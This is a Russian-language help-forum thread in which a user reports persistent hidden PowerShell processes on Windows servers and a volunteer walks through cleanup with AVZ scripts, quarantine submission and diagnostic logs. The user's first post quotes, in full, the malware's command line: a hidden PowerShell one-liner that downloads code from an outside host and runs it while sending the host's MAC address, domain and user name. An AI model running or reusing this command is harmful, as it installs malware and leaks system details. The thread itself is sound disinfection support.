| TimofeevAGVN53 |
02-10-2019 12:08 2890464 |
Powershell грузить процессор + память.
Windows 2008 r2 после загрузки появляется несколько процессов powershell
Вот с таким скриптов
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://down.bddp.net/d64.dat?allv6&mac=00-19-D1-A9-99-6E&av=&version=6.1.7601&bit=64-bit&flag2=True&domain=hard.nov&user=SMS01$&PS=True')"
|
Здравствуйте!
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
begin
ClearQuarantineEx(true);
QuarantineFile('C:\Windows\system32\tasks\00-19-D1-A9-99-6E', '');
QuarantineFile('C:\Windows\system32\tasks\Rass', '');
DeleteSchedulerTask('Microsoft\Windows\00-19-D1-A9-99-6E');
DeleteSchedulerTask('Microsoft\Windows\Rass');
end.
Перезагрузите компьютер вручную.
После перезагрузки, выполните такой скрипт:
Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
Прикрепите свежий CollectionLog. |
| TimofeevAGVN53 |
02-10-2019 17:35 2890510 |
Спасибо, как снимать лог с виртуальных машин Hyper-V?
|
В первом сообщении вы же прикрепили лог.
|
| TimofeevAGVN53 |
03-10-2019 08:49 2890563 |
Этот был один из серверов. И там всё стало хорошо. Есть ещё три сервера, но они на виртуальных машинах и логирование не удаётся выполнить из-за того что подключен по РДП. Через оснастку mmc то же самое говорит.
|
Так покажите контрольный лог.
Действуем по принципу один компьютер - одна тема.
Сделайте на виртуалках так:
Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования, - Скачайте Universal Virus Sniffer (uVS)
- Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
- Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. - Дождитесь окончания работы программы и прикрепите лог к посту в теме.
!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS. |
| TimofeevAGVN53 |
10-10-2019 14:48 2891496 |
После выполнения данных скриптов - через несколько дней опять появляются процессы powershell.
Выполнение данного скрипта помогает на некоторое время.
|
| TimofeevAGVN53 |
10-10-2019 15:11 2891500 |
на hyper-v core как то можно запустить эти скрипты?
|
Я ведь говорил, что
Цитата:
Цитата Sandor
один компьютер - одна тема »
|
так как скрипт не универсальный и основан на логах конкретной системы.
Продолжать вы почему-то не хотите. |
| TimofeevAGVN53 |
10-10-2019 16:13 2891518 |
Это про тот же компьютер. Нам опять запустились процессы. Про Hyper-v мне создать отдельную тему?
|
Цитата:
Цитата TimofeevAGVN53
Это про тот же компьютер »
|
И я про тот же :)
В сообщении №6 инструкция по сбору очередного лога.
Пробовали там запустить Autologger? |
| TimofeevAGVN53 |
03-11-2019 22:53 2894647 |
|
Время: 00:19.
© OSzone.net 2001-
